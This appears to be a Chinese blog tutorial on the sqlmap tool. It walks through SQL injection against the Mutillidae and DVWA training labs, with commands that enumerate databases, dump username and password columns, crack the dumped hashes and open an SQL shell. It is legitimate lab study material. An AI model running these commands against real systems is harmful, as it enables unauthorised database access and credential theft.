sqlmap自动注入

SQL注入比较好用的工具,首推开源工具SQLmap。SQLmap是一个国内外著名的安全稳定性测试工具,可以用来进行自动
化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的安全稳
定性测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系
统命令。
SQLmap支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,
Firebird, Sybase和SAP MaxDB等数据库的各种安全漏洞检测。

 

-u 目标url

--batch 自动选择执行

-p指定注入点

--dbs 查所有库

--users 查所有用户

--current-user 当前用户

--current-db  当前库

 -D nowasp --tables              nowasp这个库的所有表

-D nowasp  -T accounts --columns     nowasp这个库的accounts这个表的列

 

GET方法注入:

root@kali:/usr/share/sqlmap-dev# python sqlmap.py -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username

 

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username --dbs

 

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username --users

 

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username --current-user

获得当前数据库:

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username --current-db

获得数据库的表:

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username -D nowasp --tables

获得表的字段:

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username -D nowasp -T accounts --columns

获得表中的数据(只获得username和password   -C "username,password" ):

sqlmap -u "http://192.168.204.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details" --batch -p username -D nowasp -T accounts -C "username,password" --dump

 

POST方法注入: 

以上是不用登录时的网站,如果需要登录的,得先注册账号登录,获取到cookie

 

 

sqlmap -u "http://192.168.204.133/dvwa/vulnerabilities/sqli/?id=444&Submit=Submit#" --batch  --cookie="PHPSESSID=4hitqpmse5jsoleb5fdktauk80;security=low"

 

获取数据库

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/dvwa/vulnerabilities/sqli/?id=444&Submit=Submit#" --batch  --cookie="PHPSESSID=4hitqpmse5jsoleb5fdktauk80;security=low" --dbs

 获取表

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/dvwa/vulnerabilities/sqli/?id=444&Submit=Submit#" --batch  --cookie="PHPSESSID=4hitqpmse5jsoleb5fdktauk80;security=low" -D dvwa --tables

获取列

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/dvwa/vulnerabilities/sqli/?id=444&Submit=Submit#" --batch  --cookie="PHPSESSID=4hitqpmse5jsoleb5fdktauk80;security=low" -D dvwa -T users --columns

 

获得表中的数据(只获得username和password   -C "username,password" ):

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/dvwa/vulnerabilities/sqli/?id=44&Submit=Submit#"  --cookie="PHPSESSID=4hitqpmse5jsoleb5fdktauk80;security=low" -D dvwa -T users -C "user,password" --dump

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[04:31:23] [INFO] writing hashes to a temporary file '/tmp/sqlmapYhWk861866/sqlmaphashes-b521h5.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[04:32:28] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap-dev/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[04:32:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y   选N  y很慢。。
[04:32:43] [INFO] starting dictionary-based cracking (md5_generic_passwd)

 

 

 

//与数据库交互 --sql-shell:

root@kali:/usr/src# sqlmap -u "http://192.168.204.133/dvwa/vulnerabilities/sqli/?id=444&Submit=Submit#"  --cookie="PHPSESSID=4hitqpmse5jsoleb5fdktauk80;security=low" --sql-shell

 

posted @   聚散浮沉  阅读(213)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 单元测试从入门到精通
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
点击右上角即可分享
微信分享提示